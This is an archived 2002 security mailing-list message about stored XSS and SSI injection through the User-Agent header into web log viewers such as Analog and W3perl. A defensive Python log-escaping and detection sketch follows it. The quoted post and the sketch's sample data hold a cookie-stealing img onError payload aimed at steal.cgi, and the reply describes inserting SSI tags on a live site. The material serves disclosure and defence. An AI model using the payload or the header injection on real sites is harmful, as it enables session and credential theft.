> normally it would contain something like... Mozilla/4.0 (compatible; MSIE
> 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
> ..
>
> but with a proxy prog (I use proxomitron) you can change it to whatever you
> like..
>
> for example: <img src="x.jpg"
> onError="this.src='steal.cgi?document.cookie';">
>
> and if the site logs it, you just got the administrator's password:)
>
> Now, I'm yet to come across any sites that this works on because I just
> thought of it this afternoon but let me know if it works:) in any case, a
> lot of sites would log/store this kind of information so it should be fixed.

A hole in Analog and W3perl suffered from this problem. I'm sure other software does.
I have personally found an example of SSI tag inserting using this method on 1 website running "product unknown". I inserted SSI into the User agent field and visited the site which displayed the logs in an SSI page. It executed the SSI tag which I inserted.

I just wrote a paper on cookie theft with XSS that may be worth a peek to you.
www.cgisecurity.com/articles/xss-faq.shtml

Also see http://www.cgisecurity.net/papers/header-based-exploitation.txt

- zenoat_private
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 14:18:10 PDT
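
A defender-side sketch of the issue discussed in this thread, added as an example and not part of the original message: a log-report generator that writes logged header fields into HTML unescaped, beside one that escapes them at output time, plus a check that flags markup in header fields. The function names and the sample log lines are constructed for illustration.

```python
import html
import re

# Combined Log Format; the last two quoted fields are client-supplied headers.
CLF = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# Markup that does not belong in a request header: HTML tags (this also
# covers the "<!--#" that opens an SSI directive) and inline event handlers.
SUSPICIOUS = re.compile(r'<\s*[a-zA-Z!/]|\bon\w+\s*=', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges). The second carries the
# User-Agent value quoted in the message, the third an SSI directive.
SAMPLE = [
    r'''192.0.2.10 - - [26/May/2002:13:55:36 -0700] "GET / HTTP/1.0" 200 2326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"''',
    r'''198.51.100.7 - - [26/May/2002:13:56:02 -0700] "GET / HTTP/1.0" 200 2326 "-" "<img src=\"x.jpg\" onError=\"this.src='steal.cgi?document.cookie';\">"''',
    r'''203.0.113.5 - - [26/May/2002:13:57:40 -0700] "GET / HTTP/1.0" 200 2326 "-" "<!--#echo var=\"DATE_LOCAL\" -->"''',
]

def parse(line):
    """Split one log line into named fields, or return None if malformed."""
    m = CLF.match(line)
    return m.groupdict() if m else None

def render_row_unsafe(entry):
    # The flawed pattern: header bytes are copied straight into the report.
    return "<tr><td>%s</td><td>%s</td></tr>" % (entry["host"], entry["agent"])

def render_row(entry):
    # Hardened form: every client-controlled field is escaped when written
    # out, so the browser (or an SSI parser) sees text, not markup.
    cells = (entry["host"], entry["referer"], entry["agent"])
    return "<tr>%s</tr>" % "".join(
        "<td>%s</td>" % html.escape(c, quote=True) for c in cells)

def flag(entry):
    """Return the names of header-derived fields that contain markup."""
    return [f for f in ("referer", "agent", "request")
            if SUSPICIOUS.search(entry[f])]

if __name__ == "__main__":
    for line in SAMPLE:
        entry = parse(line)
        print(flag(entry), render_row(entry))
```

Escaping belongs in the report generator, at the point where the field is written into HTML; the `flag` check is only a triage aid for reviewing existing logs.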